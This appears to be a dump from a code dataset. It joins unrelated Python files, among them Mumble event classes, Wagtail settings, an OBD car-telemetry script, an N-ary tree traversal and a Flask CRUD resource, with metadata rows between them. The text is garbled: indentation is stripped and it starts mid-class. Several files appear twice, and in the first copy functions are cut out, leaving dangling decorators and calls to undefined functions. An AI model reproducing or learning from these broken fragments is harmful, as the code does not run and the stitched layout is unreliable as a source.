# TODO: Update this docstring when we know what this is for
alpha = ""
beta = ""
prefer_alpha = False
opus = ""
def __init__(self, caller, alpha, beta, prefer_alpha, opus):
"""
Initialise the event object.
"""
self.alpha = alpha
self.beta = beta
self.prefer_alpha = prefer_alpha
self.opus = opus
super(CodecVersion, self).__init__(caller)
class CryptoSetup(MumbleEvent):
"""
Crypto setup message
"""
# TODO: Update this docstring when we know what this is for
key = ""
client_nonce = ""
server_nonce = ""
def __init__(self, caller, key, client_n, server_n):
"""
Initialise the event object.
"""
self.key = key
self.client_nonce = client_n
self.server_nonce = server_n
super(CryptoSetup, self).__init__(caller)
class PermissionsQuery(MumbleEvent):
"""
Permissions query - Sent when.. we query permissions?
"""
# TODO: Update this docstring when we know what this is for
channel = None
permissions = ""
flush = ""
def __init__(self, caller, channel, permissions, flush):
"""
Initialise the event object.
"""
self.channel = channel
self.permissions = permissions
self.flush = flush
super(PermissionsQuery, self).__init__(caller)
class ServerSync(MumbleEvent):
"""
Server sync message - Sent when we connect to the server
"""
session = ""
max_bandwidth = ""
permissions = ""
welcome_text = ""
def __init__(self, caller, session, max_bandwidth, welcome_text,
permissions):
"""
Initialise the event object.
"""
self.session = session
self.max_bandwidth = max_bandwidth
self.welcome_text = welcome_text
self.permissions = permissions
super(ServerSync, self).__init__(caller)
class ServerConfig(MumbleEvent):
"""
Server config message
"""
# TODO: Update this docstring when we know what this is for
max_bandwidth = ""
welcome_text = ""
allow_html = True
message_length = 0
image_message_length = 0
def __init__(self, caller, max_bandwidth, welcome_text, allow_html,
message_length, image_message_length):
"""
Initialise the event object.
"""
self.max_bandwidth = max_bandwidth
self.welcome_text = welcome_text
self.allow_html = allow_html
self.message_length = message_length
self.image_message_length = image_message_length
super(ServerConfig, self).__init__(caller)
class Ping(MumbleEvent):
"""
A ping, I guess
"""
timestamp = ""
good = 0
late = 0
lost = 0
resync = 0
tcp = 0
udp = 0
tcp_avg = 0
udp_avg = 0
tcp_var = 0
udp_var = 0
def __init__(self, caller, timestamp, good, late, lost, resync, tcp, udp,
tcp_avg, udp_avg, tcp_var, udp_var):
"""
Initialise the event object.
"""
self.timestamp = timestamp
self.good = good
self.late = late
self.lost = lost
self.resync = resync
self.tcp = tcp
self.udp = udp
self.tcp_avg = tcp_avg
self.udp_avg = udp_avg
self.tcp_var = tcp_var
self.udp_var = udp_var
super(Ping, self).__init__(caller)
class UserRemove(MumbleEvent):
"""
User removal message
It looks like this is fired under three conditions..
* When a user disconnects or loses connection
* *kicker* will be None in that case
* When a user is kicked
* *kicker* will be set and ban will be False
* When a user is banned
* *kicker* will be set and ban will be True
This still requires some more research, the Mumble docs are awful.
"""
# TODO: Update this docstring when we're more sure of it
session = "" # Session ID
actor = "" # Session ID
user = None # User object
kicker = None # User object
reason = "" # Reason
ban = False # True if banned, false if kicked
def __init__(self, caller, session, actor, user, reason, ban, kicker):
"""
Initialise the event object.
"""
self.caller = caller
self.session = session
self.actor = actor
self.user = user
self.reason = reason
self.ban = ban
self.kicker = kicker
super(UserRemove, self).__init__(caller)
class Unknown(MumbleEvent):
"""
Unknown message - Called when we get a message that isn't already
handled
"""
type = ""
message = None
def __init__(self, caller, typ, message):
"""
Initialise the event object.
"""
self.type = typ
self.message = message
super(Unknown, self).__init__(caller)
class UserJoined(MumbleEvent):
"""
User join - Sent when a user joins the server
"""
user = None
def __init__(self, caller, user):
"""
Initialise the event object.
"""
self.user = user
super(UserJoined, self).__init__(caller)
class UserMoved(MumbleEvent):
"""
User moved - Sent when a user moves channel, or is moved
This is also fired when a user connects.
"""
user = None
channel = None
old_channel = None
def __init__(self, caller, user, channel, old):
"""
Initialise the event object.
"""
self.user = user
self.channel = channel
self.old_channel = old
super(UserMoved, self).__init__(caller)
class UserStateToggleEvent(MumbleEvent):
"""
Base class for events that are simply user state toggles
Don't use this directly; inherit it!
"""
user = None
state = False
actor = None
def __init__(self, caller, user, state, actor=None):
"""
Initialise the event object.
"""
self.user = user
self.state = state
self.actor = actor
super(UserStateToggleEvent, self).__init__(caller)
class UserMuteToggle(UserStateToggleEvent):
"""
User mute toggle - Sent when a user is muted or unmuted (but not by
themselves)
state: True if muted, False if unmuted
"""
pass
class UserDeafToggle(UserStateToggleEvent):
"""
User deaf toggle - Sent when a user is deafened or undeafened (but not
by themselves)
state: True if deafened, False if undeafened
"""
pass
class UserSuppressionToggle(UserStateToggleEvent):
"""
User suppression toggle - Sent when a user is suppressed or
unsuppressed
state: True if suppressed, False if unsuppressed
"""
pass
class UserSelfMuteToggle(UserStateToggleEvent):
"""
User mute toggle - Sent when a user is muted or unmuted by
themselves
state: True if muted, False if unmuted
"""
pass
class UserSelfDeafToggle(UserStateToggleEvent):
"""
User deaf toggle - Sent when a user is deafened or undeafened by
themselves
state: True if deafened, False if undeafened
"""
pass
class UserPrioritySpeakerToggle(UserStateToggleEvent):
"""
Priority speaker toggle - Sent when a user is set as priority speaker
state: True if set, False if unset
"""
pass
class UserRecordingToggle(UserStateToggleEvent):
"""
Recording toggle - Sent when a user starts or stops recording
state: True if started, False if stopped
"""
pass
class UserStats(MumbleEvent):
"""
User stats updated
user: User whose stats have been updated
"""
def __init__(self, caller, user):
"""
Initialise the event object.
"""
self.user = user
super(UserStats, self).__init__(caller)
class UserRegisteredEvent(MumbleEvent):
"""
Base class for user [un]registered events
Don't use this directly; inherit it!
"""
def __init__(self, caller, user, user_id, actor):
"""
Initialise the event object.
"""
self.user = user
self.user_id = user_id
self.actor = actor
super(UserRegisteredEvent, self).__init__(caller)
class UserRegistered(UserRegisteredEvent):
"""
User registered
user: User who has been registered
user_id: User's new ID
actor: User who registered `user`
"""
class UserUnregistered(UserRegisteredEvent):
"""
User unregistered
user: User who has been unregistered
user_id: User's old ID
actor: User who unregistered `user`
"""
class ChannelCreated(MumbleEvent):
"""
New channel - Sent when a channel is created
"""
channel = None
def __init__(self, caller, channel):
"""
Initialise the event object.
"""
self.channel = channel
super(ChannelCreated, self).__init__(caller)
class ChannelLinked(MumbleEvent):
"""
Channel link added - Sent when two channels are linked together
"""
from_channel = None
to_channel = None
def __init__(self, caller, from_, to_):
"""
Initialise the event object.
"""
self.from_channel = from_
self.to_channel = to_
super(ChannelLinked, self).__init__(caller)
class ChannelUnlinked(MumbleEvent):
"""
Channel link removed - Sent when two channels have their link removed
"""
from_channel = None
to_channel = None
def __init__(self, caller, from_, to_):
"""
Initialise the event object.
"""
self.from_channel = from_
self.to_channel = to_
super(ChannelUnlinked, self).__init__(caller)
| 56 | 0 | 27 |
9adb43ddfd7c249bcc04844d8cc841ab379b1785 | 7,009 | py | Python | wagtail_template/settings/base.py | b-ggs/wagtail-template | d6b7dfe4ab2cf0af8f412148b394d7b44a6a278a | [
"BSD-3-Clause"
] | null | null | null | wagtail_template/settings/base.py | b-ggs/wagtail-template | d6b7dfe4ab2cf0af8f412148b394d7b44a6a278a | [
"BSD-3-Clause"
] | null | null | null | wagtail_template/settings/base.py | b-ggs/wagtail-template | d6b7dfe4ab2cf0af8f412148b394d7b44a6a278a | [
"BSD-3-Clause"
] | null | null | null | """
Django settings for wagtail_template project.
Generated by 'django-admin startproject' using Django 4.0.3.
For more information on this file, see
https://docs.djangoproject.com/en/4.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/4.0/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
import dj_database_url
PROJECT_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
BASE_DIR = os.path.dirname(PROJECT_DIR)
# Django env
DJANGO_ENV = os.environ.get("DJANGO_ENV", "production")
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/4.0/howto/deployment/checklist/
# Application definition
INSTALLED_APPS = [
"wagtail_template.home",
"wagtail_template.search",
"wagtail_template.utils",
# Simplified static file serving
# https://devcenter.heroku.com/articles/django-assets
# https://warehouse.python.org/project/whitenoise/
"whitenoise",
"wagtail.contrib.forms",
"wagtail.contrib.redirects",
"wagtail.embeds",
"wagtail.sites",
"wagtail.users",
"wagtail.snippets",
"wagtail.documents",
"wagtail.images",
"wagtail.search",
"wagtail.admin",
"wagtail.core",
"django_extensions",
"modelcluster",
"taggit",
"django.contrib.admin",
"django.contrib.auth",
"django.contrib.contenttypes",
"django.contrib.sessions",
"django.contrib.messages",
"django.contrib.staticfiles",
]
MIDDLEWARE = [
"django.contrib.sessions.middleware.SessionMiddleware",
"django.middleware.common.CommonMiddleware",
"django.middleware.csrf.CsrfViewMiddleware",
"django.contrib.auth.middleware.AuthenticationMiddleware",
"django.contrib.messages.middleware.MessageMiddleware",
"django.middleware.clickjacking.XFrameOptionsMiddleware",
"django.middleware.security.SecurityMiddleware",
# Simplified static file serving
# https://devcenter.heroku.com/articles/django-assets
# https://warehouse.python.org/project/whitenoise/
"whitenoise.middleware.WhiteNoiseMiddleware",
"wagtail.contrib.redirects.middleware.RedirectMiddleware",
]
ROOT_URLCONF = "wagtail_template.urls"
TEMPLATES = [
{
"BACKEND": "django.template.backends.django.DjangoTemplates",
"DIRS": [
os.path.join(PROJECT_DIR, "templates"),
],
"APP_DIRS": True,
"OPTIONS": {
"context_processors": [
"django.template.context_processors.debug",
"django.template.context_processors.request",
"django.contrib.auth.context_processors.auth",
"django.contrib.messages.context_processors.messages",
],
},
},
]
WSGI_APPLICATION = "wagtail_template.wsgi.application"
# Database
# https://docs.djangoproject.com/en/4.0/ref/settings/#databases
if "DATABASE_URL" in os.environ:
DATABASES = {
"default": dj_database_url.parse(os.environ["DATABASE_URL"]),
}
# Password validation
# https://docs.djangoproject.com/en/4.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
"NAME": "django.contrib.auth.password_validation.UserAttributeSimilarityValidator",
},
{
"NAME": "django.contrib.auth.password_validation.MinimumLengthValidator",
},
{
"NAME": "django.contrib.auth.password_validation.CommonPasswordValidator",
},
{
"NAME": "django.contrib.auth.password_validation.NumericPasswordValidator",
},
]
# Internationalization
# https://docs.djangoproject.com/en/4.0/topics/i18n/
LANGUAGE_CODE = "en-us"
TIME_ZONE = "UTC"
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/4.0/howto/static-files/
STATICFILES_FINDERS = [
"django.contrib.staticfiles.finders.FileSystemFinder",
"django.contrib.staticfiles.finders.AppDirectoriesFinder",
]
STATICFILES_DIRS = [
os.path.join(PROJECT_DIR, "static"),
]
# Simplified static file serving
# https://devcenter.heroku.com/articles/django-assets
# https://warehouse.python.org/project/whitenoise/
STATICFILES_STORAGE = "whitenoise.storage.CompressedManifestStaticFilesStorage"
STATIC_ROOT = os.path.join(BASE_DIR, "staticfiles")
STATIC_URL = "/static/"
# Media storage
if aws_storage_bucket_name := os.getenv("AWS_STORAGE_BUCKET_NAME"):
AWS_STORAGE_BUCKET_NAME = aws_storage_bucket_name
DEFAULT_FILE_STORAGE = "storages.backends.s3boto3.S3Boto3Storage"
AWS_ACCESS_KEY_ID = os.getenv("AWS_ACCESS_KEY_ID")
AWS_SECRET_ACCESS_KEY = os.getenv("AWS_SECRET_ACCESS_KEY")
AWS_S3_REGION_NAME = os.getenv("AWS_S3_REGION_NAME")
AWS_S3_CUSTOM_DOMAIN = os.getenv("AWS_S3_CUSTOM_DOMAIN")
AWS_LOCATION = os.getenv("AWS_LOCATION", "")
# Lines below this are likely only relevant for using Minio locally
AWS_S3_ENDPOINT_URL = os.getenv("AWS_S3_ENDPOINT_URL")
AWS_S3_USE_SSL = os.getenv("AWS_S3_USE_SSL", "true").lower() == "true"
AWS_S3_SECURE_URLS = os.getenv("AWS_S3_USE_SSL", "true").lower() == "true"
# Wagtail settings
WAGTAIL_SITE_NAME = "wagtail_template"
# Search
# https://docs.wagtail.org/en/stable/topics/search/backends.html
WAGTAILSEARCH_BACKENDS = {
"default": {
"BACKEND": "wagtail.search.backends.database",
}
}
# Base URL to use when referring to full URLs within the Wagtail admin backend -
# e.g. in notification emails. Don't include '/admin' or a trailing slash
BASE_URL = os.getenv("BASE_URL", "")
ALLOWED_HOSTS = os.getenv("ALLOWED_HOSTS", "").split(",")
SECRET_KEY = os.getenv("SECRET_KEY", "")
# Error reporting
# https://docs.sentry.io/platforms/python/guides/django/
# https://glitchtip.com/sdkdocs/python-django
if sentry_dsn := os.getenv("SENTRY_DSN"):
import sentry_sdk
from sentry_sdk.integrations.django import DjangoIntegration
from sentry_sdk.utils import get_default_release
SENTRY_ENVIRONMENT = DJANGO_ENV
# Attempt to get release version from Sentry's utils and a couple other environment variables
SENTRY_ARGS = {
"dsn": sentry_dsn,
"integrations": [DjangoIntegration()],
"environment": SENTRY_ENVIRONMENT,
"release": get_release_version(),
"traces_sample_rate": 0.01,
}
# Auto session tracking is not supported by GlitchTip
if "sentry.io" in sentry_dsn:
SENTRY_ARGS["auto_session_tracking"] = True
else:
SENTRY_ARGS["auto_session_tracking"] = False
sentry_sdk.init(**SENTRY_ARGS)
# Enables URL to test Sentry integration
ENABLE_SENTRY_TEST_URL = (
os.environ.get("ENABLE_SENTRY_TEST_URL", "false").lower() == "true"
)
| 29.952991 | 97 | 0.709231 | """
Django settings for wagtail_template project.
Generated by 'django-admin startproject' using Django 4.0.3.
For more information on this file, see
https://docs.djangoproject.com/en/4.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/4.0/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
import dj_database_url
PROJECT_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
BASE_DIR = os.path.dirname(PROJECT_DIR)
# Django env
DJANGO_ENV = os.environ.get("DJANGO_ENV", "production")
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/4.0/howto/deployment/checklist/
# Application definition
INSTALLED_APPS = [
"wagtail_template.home",
"wagtail_template.search",
"wagtail_template.utils",
# Simplified static file serving
# https://devcenter.heroku.com/articles/django-assets
# https://warehouse.python.org/project/whitenoise/
"whitenoise",
"wagtail.contrib.forms",
"wagtail.contrib.redirects",
"wagtail.embeds",
"wagtail.sites",
"wagtail.users",
"wagtail.snippets",
"wagtail.documents",
"wagtail.images",
"wagtail.search",
"wagtail.admin",
"wagtail.core",
"django_extensions",
"modelcluster",
"taggit",
"django.contrib.admin",
"django.contrib.auth",
"django.contrib.contenttypes",
"django.contrib.sessions",
"django.contrib.messages",
"django.contrib.staticfiles",
]
MIDDLEWARE = [
"django.contrib.sessions.middleware.SessionMiddleware",
"django.middleware.common.CommonMiddleware",
"django.middleware.csrf.CsrfViewMiddleware",
"django.contrib.auth.middleware.AuthenticationMiddleware",
"django.contrib.messages.middleware.MessageMiddleware",
"django.middleware.clickjacking.XFrameOptionsMiddleware",
"django.middleware.security.SecurityMiddleware",
# Simplified static file serving
# https://devcenter.heroku.com/articles/django-assets
# https://warehouse.python.org/project/whitenoise/
"whitenoise.middleware.WhiteNoiseMiddleware",
"wagtail.contrib.redirects.middleware.RedirectMiddleware",
]
ROOT_URLCONF = "wagtail_template.urls"
TEMPLATES = [
{
"BACKEND": "django.template.backends.django.DjangoTemplates",
"DIRS": [
os.path.join(PROJECT_DIR, "templates"),
],
"APP_DIRS": True,
"OPTIONS": {
"context_processors": [
"django.template.context_processors.debug",
"django.template.context_processors.request",
"django.contrib.auth.context_processors.auth",
"django.contrib.messages.context_processors.messages",
],
},
},
]
WSGI_APPLICATION = "wagtail_template.wsgi.application"
# Database
# https://docs.djangoproject.com/en/4.0/ref/settings/#databases
if "DATABASE_URL" in os.environ:
DATABASES = {
"default": dj_database_url.parse(os.environ["DATABASE_URL"]),
}
# Password validation
# https://docs.djangoproject.com/en/4.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
"NAME": "django.contrib.auth.password_validation.UserAttributeSimilarityValidator",
},
{
"NAME": "django.contrib.auth.password_validation.MinimumLengthValidator",
},
{
"NAME": "django.contrib.auth.password_validation.CommonPasswordValidator",
},
{
"NAME": "django.contrib.auth.password_validation.NumericPasswordValidator",
},
]
# Internationalization
# https://docs.djangoproject.com/en/4.0/topics/i18n/
LANGUAGE_CODE = "en-us"
TIME_ZONE = "UTC"
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/4.0/howto/static-files/
STATICFILES_FINDERS = [
"django.contrib.staticfiles.finders.FileSystemFinder",
"django.contrib.staticfiles.finders.AppDirectoriesFinder",
]
STATICFILES_DIRS = [
os.path.join(PROJECT_DIR, "static"),
]
# Simplified static file serving
# https://devcenter.heroku.com/articles/django-assets
# https://warehouse.python.org/project/whitenoise/
STATICFILES_STORAGE = "whitenoise.storage.CompressedManifestStaticFilesStorage"
STATIC_ROOT = os.path.join(BASE_DIR, "staticfiles")
STATIC_URL = "/static/"
# Media storage
if aws_storage_bucket_name := os.getenv("AWS_STORAGE_BUCKET_NAME"):
AWS_STORAGE_BUCKET_NAME = aws_storage_bucket_name
DEFAULT_FILE_STORAGE = "storages.backends.s3boto3.S3Boto3Storage"
AWS_ACCESS_KEY_ID = os.getenv("AWS_ACCESS_KEY_ID")
AWS_SECRET_ACCESS_KEY = os.getenv("AWS_SECRET_ACCESS_KEY")
AWS_S3_REGION_NAME = os.getenv("AWS_S3_REGION_NAME")
AWS_S3_CUSTOM_DOMAIN = os.getenv("AWS_S3_CUSTOM_DOMAIN")
AWS_LOCATION = os.getenv("AWS_LOCATION", "")
# Lines below this are likely only relevant for using Minio locally
AWS_S3_ENDPOINT_URL = os.getenv("AWS_S3_ENDPOINT_URL")
AWS_S3_USE_SSL = os.getenv("AWS_S3_USE_SSL", "true").lower() == "true"
AWS_S3_SECURE_URLS = os.getenv("AWS_S3_USE_SSL", "true").lower() == "true"
# Wagtail settings
WAGTAIL_SITE_NAME = "wagtail_template"
# Search
# https://docs.wagtail.org/en/stable/topics/search/backends.html
WAGTAILSEARCH_BACKENDS = {
"default": {
"BACKEND": "wagtail.search.backends.database",
}
}
# Base URL to use when referring to full URLs within the Wagtail admin backend -
# e.g. in notification emails. Don't include '/admin' or a trailing slash
BASE_URL = os.getenv("BASE_URL", "")
ALLOWED_HOSTS = os.getenv("ALLOWED_HOSTS", "").split(",")
SECRET_KEY = os.getenv("SECRET_KEY", "")
# Error reporting
# https://docs.sentry.io/platforms/python/guides/django/
# https://glitchtip.com/sdkdocs/python-django
if sentry_dsn := os.getenv("SENTRY_DSN"):
import sentry_sdk
from sentry_sdk.integrations.django import DjangoIntegration
from sentry_sdk.utils import get_default_release
SENTRY_ENVIRONMENT = DJANGO_ENV
# Attempt to get release version from Sentry's utils and a couple other environment variables
def get_release_version():
release = get_default_release()
# Use GIT_REV for Dokku
release = release or os.getenv("GIT_REV")
# Use DJANGO_ENV as a final fallback
return release or DJANGO_ENV
SENTRY_ARGS = {
"dsn": sentry_dsn,
"integrations": [DjangoIntegration()],
"environment": SENTRY_ENVIRONMENT,
"release": get_release_version(),
"traces_sample_rate": 0.01,
}
# Auto session tracking is not supported by GlitchTip
if "sentry.io" in sentry_dsn:
SENTRY_ARGS["auto_session_tracking"] = True
else:
SENTRY_ARGS["auto_session_tracking"] = False
sentry_sdk.init(**SENTRY_ARGS)
# Enables URL to test Sentry integration
ENABLE_SENTRY_TEST_URL = (
os.environ.get("ENABLE_SENTRY_TEST_URL", "false").lower() == "true"
)
| 209 | 0 | 26 |
243d131c3f4dd5c382d0fd89e7593090e1cd85cd | 1,195 | py | Python | app/ples/templatetags/ples.py | misli/ples | 1cccd19946d460a232d79113465706472577729a | [
"BSD-3-Clause"
] | null | null | null | app/ples/templatetags/ples.py | misli/ples | 1cccd19946d460a232d79113465706472577729a | [
"BSD-3-Clause"
] | null | null | null | app/ples/templatetags/ples.py | misli/ples | 1cccd19946d460a232d79113465706472577729a | [
"BSD-3-Clause"
] | null | null | null | from __future__ import absolute_import, division, generators, nested_scopes, print_function, unicode_literals, with_statement
from django import template
from ..models import Seat
register = template.Library()
@register.filter
@register.inclusion_tag('seat.html', takes_context=True)
| 31.447368 | 125 | 0.681172 | from __future__ import absolute_import, division, generators, nested_scopes, print_function, unicode_literals, with_statement
from django import template
from ..models import Seat
register = template.Library()
@register.filter
def split(value):
return value.split()
@register.inclusion_tag('seat.html', takes_context=True)
def seat(context, room, table):
# this should not happen with valid template
if room not in Seat.ROOMS:
raise Exception('"{}" is not valid room'.format(room))
if not table:
raise Exception('"{}" is not valid table'.format(table))
# use form.seat_counts to store counters
# it is always the same with different copies of context
if not hasattr(context['form'], 'seat_counts'):
context['form'].seat_counts = {}
rt = '{}-{}'.format(room, table)
s = context['form'].seat_counts[rt] = context['form'].seat_counts.get(rt, 0) + 1
seat = Seat.objects.get_or_create(room=room, table=table, seat=s)[0]
seat_context = {}
seat_context['seat'] = seat
try:
seat_context['variant'] = context['form']['seat-{}-variant'.format(seat.id)]
except KeyError:
pass
return seat_context
| 859 | 0 | 44 |
2e6006e584a17825353e404af334a6f750425bb8 | 911 | py | Python | data/worker.py | suibex/fleonSide | 6bdf3b1cc2893984f7bff6715ec333e9c2cfcbae | [
"CC0-1.0"
] | 1 | 2022-01-17T22:46:02.000Z | 2022-01-17T22:46:02.000Z | data/worker.py | suibex/fleonSide | 6bdf3b1cc2893984f7bff6715ec333e9c2cfcbae | [
"CC0-1.0"
] | null | null | null | data/worker.py | suibex/fleonSide | 6bdf3b1cc2893984f7bff6715ec333e9c2cfcbae | [
"CC0-1.0"
] | null | null | null | import threading
import os
import obd
from random import random
from pathlib import Path
conn = obd.OBD()
connect = obd.Async(fast=False)
speed=""
fueli=""
tem =""
connect.watch(obd.commands.INTAKE_TEMP,callback=get_temp)
connect.watch(obd.commands.FUEL_LEVEL,callback=get_fuel)
connect.watch(obd.commands.SPEED,callback=get_speed)
while True:
tempz = open("temp.txt","w+")
fuel1 = open("fuel.txt","w+")
speed1 = open("speed.txt","w+")
speed1.write(speed)
tempz.write(tem)
fuel1.write(fueli)
print(speed)
| 15.706897 | 57 | 0.607025 | import threading
import os
import obd
from random import random
from pathlib import Path
conn = obd.OBD()
connect = obd.Async(fast=False)
speed=""
fueli=""
tem =""
def get_temp(t):
if not t.is_null():
tem=str(t.value)
if t.is_null():
tem=str(0)
def get_fuel(f):
    """obd.Async callback: record the latest fuel-level reading.

    Stores the reading (or "0" for a null reading) in the module-level
    ``fueli`` string that the main loop writes to fuel.txt.
    """
    global fueli  # BUG FIX: without this the assignments only created a local
    if f.is_null():
        fueli = str(0)
    else:
        fueli = str(f.value)
def get_speed(s):
    """obd.Async callback: record the latest vehicle-speed reading.

    Stores the reading (or "0" for a null reading) in the module-level
    ``speed`` string that the main loop writes to speed.txt.
    """
    global speed  # BUG FIX: without this the assignments only created a local
    if s.is_null():
        speed = str(0)
    else:
        speed = str(s.value)
# Register the callbacks above; the async OBD connection invokes each one
# whenever a fresh reading for the watched command arrives.
# NOTE(review): connect.start() is never called in this file — confirm the
# Async watcher is actually started somewhere, or the callbacks never fire.
connect.watch(obd.commands.INTAKE_TEMP,callback=get_temp)
connect.watch(obd.commands.FUEL_LEVEL,callback=get_fuel)
connect.watch(obd.commands.SPEED,callback=get_speed)
# Main loop: continuously dump the latest readings to text files for other
# processes to pick up.  NOTE(review): this is a busy loop with no sleep —
# confirm whether throttling is intended.
while True:
    # Use context managers so every file is flushed and closed each pass;
    # the original opened three new handles per iteration and leaked them.
    with open("temp.txt", "w+") as tempz:
        tempz.write(tem)
    with open("fuel.txt", "w+") as fuel1:
        fuel1.write(fueli)
    with open("speed.txt", "w+") as speed1:
        speed1.write(speed)
    print(speed)
| 278 | 0 | 68 |
62d5047c4d6f556bef84c17d674c5de797b2b02f | 189 | py | Python | gym_mouse_lib/gym_mouse/__init__.py | TalHadad/yolov5_pytorch | 49d3e191cf79ca759d48fe027407eba30d6a2224 | [
"Apache-2.0"
] | null | null | null | gym_mouse_lib/gym_mouse/__init__.py | TalHadad/yolov5_pytorch | 49d3e191cf79ca759d48fe027407eba30d6a2224 | [
"Apache-2.0"
] | null | null | null | gym_mouse_lib/gym_mouse/__init__.py | TalHadad/yolov5_pytorch | 49d3e191cf79ca759d48fe027407eba30d6a2224 | [
"Apache-2.0"
] | null | null | null | # Core Library
import logging
# Third party
from gym.envs.registration import register
logger = logging.getLogger(__name__)
register(id="Mouse-v0", entry_point="gym_mouse.envs:MouseEnv") | 21 | 62 | 0.793651 | # Core Library
import logging
# Third party
from gym.envs.registration import register
logger = logging.getLogger(__name__)
register(id="Mouse-v0", entry_point="gym_mouse.envs:MouseEnv") | 0 | 0 | 0 |
9af56af6b43afee1d873a3caf8046bff62a1f68a | 975 | py | Python | python/tree/N-aryTreePostorderTraversal.py | Nobodylesszb/LeetCode | 0e902f6bff4834a93ce64cf9c57fd64297e63523 | [
"MIT"
] | null | null | null | python/tree/N-aryTreePostorderTraversal.py | Nobodylesszb/LeetCode | 0e902f6bff4834a93ce64cf9c57fd64297e63523 | [
"MIT"
] | null | null | null | python/tree/N-aryTreePostorderTraversal.py | Nobodylesszb/LeetCode | 0e902f6bff4834a93ce64cf9c57fd64297e63523 | [
"MIT"
] | null | null | null | #Given an n-ary tree,
# return the postorder
# traversal of its nodes' values.
#Recursion is easy to implement and understand by definition
# https://en.wikipedia.org/wiki/Tree_traversal#Post-order_(LRN)
| 26.351351 | 73 | 0.558974 | #Given an n-ary tree,
# return the postorder
# traversal of its nodes' values.
#Recursion is easy to implement and understand by definition
# https://en.wikipedia.org/wiki/Tree_traversal#Post-order_(LRN)
class Solution:
    """Post-order (LRN) traversal of an N-ary tree, recursive and iterative."""

    def postorder(self, root):
        """Recursive post-order traversal.

        :type root: Node or None (node has ``val`` and ``children``)
        :rtype: list[int]
        """
        res = []
        if root is None:
            return res

        def recursion(node, out):
            # Visit every child first, then the node itself (LRN order).
            for child in node.children:
                recursion(child, out)
            out.append(node.val)

        recursion(root, res)
        return res

    # Iteration is basically a pre-order traversal that goes right first;
    # reversing its output yields the post-order sequence.
    def postorder1(self, root):
        """Iterative post-order traversal using an explicit stack.

        :type root: Node or None
        :rtype: list[int]
        """
        res = []
        if root is None:  # BUG FIX: original read `if root = None` (SyntaxError)
            return res
        stack = [root]
        while stack:
            curr = stack.pop()
            res.append(curr.val)
            stack.extend(curr.children)
        return res[::-1]
| 360 | 384 | 22 |
ebf21320142be0bab15ccda9ee4a55b1fe2b60a5 | 3,030 | py | Python | resourses/keywords_resource.py | maxazure/papers | d58267d86a522316f2a32128d9f9c82feee08bcc | [
"MIT"
] | null | null | null | resourses/keywords_resource.py | maxazure/papers | d58267d86a522316f2a32128d9f9c82feee08bcc | [
"MIT"
] | null | null | null | resourses/keywords_resource.py | maxazure/papers | d58267d86a522316f2a32128d9f9c82feee08bcc | [
"MIT"
] | null | null | null | from flask_restful import Resource, reqparse, request
from flask_restful import fields, marshal_with, marshal
from sqlalchemy.exc import IntegrityError
from sqlalchemy import or_, and_, text
from flask_jwt_extended import jwt_required
from models.keyword import Keyword
from app import db
from utils.util import max_res
from helpers.keywords_resource_helper import * | 30.918367 | 125 | 0.588779 | from flask_restful import Resource, reqparse, request
from flask_restful import fields, marshal_with, marshal
from sqlalchemy.exc import IntegrityError
from sqlalchemy import or_, and_, text
from flask_jwt_extended import jwt_required
from models.keyword import Keyword
from app import db
from utils.util import max_res
from helpers.keywords_resource_helper import *
class KeywordsResource(Resource):
    """CRUD endpoints for Keyword records: list/detail, create, update, delete."""

    @jwt_required
    def get(self, keyword_id=None):
        """Return one keyword by id, or a filtered, sorted, paginated list."""
        if keyword_id:
            keyword = Keyword.find_by_id(keyword_id)
            return max_res(marshal(keyword, keyword_fields))
        args = keyword_query_parser.parse_args()
        page = args['page']
        per_page = args['pagesize']
        # Whitelist the sort column so user input never reaches order_by raw.
        if args['orderby'] not in sortable_fields:
            return max_res('', code=500, errmsg='排序非法字段')
        sort = args['orderby']
        if args['desc'] > 0:
            sort = args['orderby'] + ' desc'
        conditions = make_conditions([], args)
        # BUG FIX: the original tested `conditions is []`, which is always
        # False (identity comparison with a fresh list literal); test
        # emptiness instead.  (A leftover debug print was also removed.)
        if not conditions:
            query = Keyword.query
        else:
            query = Keyword.query.filter(*conditions)
        pagination = query.order_by(text(sort)).paginate(page, per_page, error_out=False)
        paginate = {
            'total': pagination.total,
            'pageSize': pagination.per_page,
            'current': pagination.page
        }
        return max_res(marshal({
            'pagination': paginate,
            'list': [marshal(u, keyword_fields) for u in pagination.items]
        }, keyword_list_fields))

    @jwt_required
    def post(self):
        """Create a new keyword; duplicate names are rejected."""
        args = keyword_post_parser.parse_args()
        keyword = Keyword(**args)
        try:
            keyword.add()
        except IntegrityError:
            return max_res('', code=401, errmsg='名称重复')
        return max_res(marshal(keyword, keyword_fields))

    # NOTE(review): put/delete lack @jwt_required while get/post require it —
    # confirm whether unauthenticated modification is really intended.
    def put(self, keyword_id=None):
        """Update every updatable field of an existing keyword."""
        keyword = Keyword.find_by_id(keyword_id)
        args = keyword_update_parser.parse_args()
        keyword = update_all_fields(args, keyword)
        # NOTE(review): commit happens before keyword.update(); confirm the
        # ordering is intended.
        db.session.commit()
        try:
            keyword.update()
        except Exception:
            return max_res('', 500, 'Failed to modify.')
        return max_res(marshal(keyword, keyword_fields))

    def delete(self, keyword_id=None):
        """Delete a keyword by id."""
        keyword = Keyword.find_by_id(keyword_id)
        try:
            keyword.delete()
        except Exception:
            return max_res('', 500, 'The record has already deleted.')
        return max_res('The keyword has been deleted.')
741231e4e762030a801183488d2c8a85666d9f67 | 1,785 | py | Python | hardhat/recipes/python/__init__.py | stangelandcl/hardhat | 1ad0c5dec16728c0243023acb9594f435ef18f9c | [
"MIT"
